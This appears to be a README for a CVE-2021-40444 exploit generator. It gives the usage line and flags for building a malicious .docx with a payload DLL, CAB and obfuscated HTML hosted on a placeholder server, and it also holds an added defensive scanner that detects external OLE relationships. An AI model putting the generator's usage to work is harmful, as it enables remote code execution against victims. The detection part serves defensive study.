CVE-2021-40444

Usage

Run script.sh first; it creates the directories that gen.py expects. Once the script has completed, you can run gen.py as in the example below:

# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3

# Flag
-d -> Our .docx file, already modified with a Bitmap Object in the header, document body or footer
-i -> IP address (base URL of the web server that will host the generated files)
-p -> Payload (.dll)
-t -> HTML file containing the JavaScript
-r -> Name for the output modified .docx
-c -> Name for the output patched .cab
-f -> Name for the output .inf
-obf -> Optional: obfuscation of the HTML, with 3 modes (HTML Entity, UTF-16BE or Both)
-v -> Increase output verbosity

Notes

  1. http.server is served from the web directory, which will contain 3 files:
  • .cab
  • .html
  • .docx
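The .docx passed with -d carries an embedded Bitmap (OLE) object that is pointed at the web server given with -i, and that relationship is the artefact a defender can look for without opening the file in Word. The script below is an added example for this page, not code from this repository or its author: it treats the .docx as the zip package it is, walks the relationship parts for the document body, headers and footers (the three locations the -d flag mentions), and reports any OLE object relationship that resolves outside the package. The relationship Type URI and the TargetMode attribute are standard OOXML; the minimal package produced by build_sample_docx() is constructed test data, not a real Office document, and the 10.10.10.10 address is the placeholder taken from the usage line above.

```python
import io
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

# OOXML namespaces and relationship type for embedded OLE objects (standard values)
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")
IMAGE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                  "relationships/image")

# Relationship parts for the main document, headers and footers: the three places
# the generator can plant the Bitmap Object.
PART_RELS = re.compile(r"^word/_rels/(document|header\d*|footer\d*)\.xml\.rels$")

# A legitimate embedded object points at a package-relative path such as
# embeddings/oleObject1.bin; an absolute URL scheme means it is fetched remotely.
REMOTE_SCHEME = re.compile(r"^(mhtml:|https?://)", re.IGNORECASE)


def find_external_ole_targets(docx_bytes):
    """Return [(rels_part, relationship_id, target)] for every OLE object
    relationship in the document/header/footer parts that points outside the
    package, either by TargetMode="External" or by an absolute URL scheme."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not PART_RELS.match(name):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("Type") != OLE_REL_TYPE:
                    continue
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" or REMOTE_SCHEME.match(target):
                    hits.append((name, rel.get("Id"), target))
    return hits


def build_sample_docx(ole_target, external=True):
    """Build a minimal zip package with one header relationship part.
    Constructed test data only: it has just enough structure for the scanner,
    not enough to be a valid Office document."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId5" Type="{OLE_REL_TYPE}" Target="{ole_target}"{mode}/>'
        f'<Relationship Id="rId6" Type="{IMAGE_REL_TYPE}" Target="media/image1.wmf"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/header1.xml", "<hdr/>")
        zf.writestr("word/_rels/header1.xml.rels", rels)
    return buf.getvalue()


def scan_file(path):
    """Scan one .docx on disk and return its hits."""
    with open(path, "rb") as fh:
        return find_external_ole_targets(fh.read())


if __name__ == "__main__":
    # With no arguments, demonstrate on the constructed sample package.
    if len(sys.argv) == 1:
        sample = build_sample_docx("http://10.10.10.10/template.html")  # placeholder URL
        print(find_external_ole_targets(sample))
    for p in sys.argv[1:]:
        for part, rid, target in scan_file(p):
            print(f"{p}: {part} {rid} -> {target}")
```

An embedded object whose relationship is marked External or whose Target is an absolute URL is unusual in ordinary documents, so a hit is a strong triage signal for mail gateways or sandbox pre-filters, even though the check alone does not prove exploitation.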

Sample output (screenshots): Without Verbose, With Verbose

Disclaimer

This repository is for educational purposes only and is not intended to be used in the wild with bad intent. Any illegal use of this repo is strictly at your own responsibility and risk.

References

  1. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444
  3. https://github.com/klezVirus/CVE-2021-40444
  4. https://github.com/lockedbyte/CVE-2021-40444
  5. https://trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html
  6. https://tenable.com/blog/microsoft-s-september-2021-patch-tuesday-addresses-60-cves-cve-2021-40444
  7. https://news.sophos.com/en-us/2021/09/14/big-office-bug-squashed-for-september-2021s-patch-tuesday/
  8. https://huntress.com/blog/cybersecurity-advisory-hackers-are-exploiting-cve-2021-40444
  9. https://microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/
  10. https://xret2pwn.github.io/CVE-2021-40444-Analysis-and-Exploit/
  11. https://blog.sunggwanchoi.com/remote-template-injection/
  12. https://youtube.com/watch?v=dgdx3QqPCuA
  13. https://businessinsights.bitdefender.com/technical-advisory-zero-day-vulnerability-in-microsoft-mshtml-allows-remote-code-execution